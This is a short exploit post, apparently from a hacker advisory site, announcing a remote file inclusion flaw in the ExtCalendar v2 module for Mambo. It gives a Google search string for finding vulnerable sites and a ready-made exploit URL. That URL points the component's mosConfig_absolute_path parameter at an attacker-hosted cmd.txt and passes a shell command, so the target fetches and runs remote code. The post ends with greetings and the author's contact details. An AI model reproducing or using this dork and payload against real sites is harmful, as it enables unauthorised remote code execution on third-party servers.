--------------------------------------------------------------------------------
Title : ExtCalendar Mambo Module <= v2 Remote File Include Vulnerabilities ############################################################################### Discovered By saudihackrz ----------------------------------------------------------------------------- google : "powered by ExtCalendar v2" Exploit : http://[target]/[path]/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://[attacker]/cmd.txt?&cmd=ls ----------------------------------------------------------------------------- greatz: ~~~~~ SnIpEr.SA , KING18, BLACK HOURS, AL-ARAAB, ------------------------------------------------------------------------------- Contact: ~~~~~~~ Nick: saudi hackrz E-mail: saudi.unix[at]hotmail[dot]Com site: http://www.3asfh.net
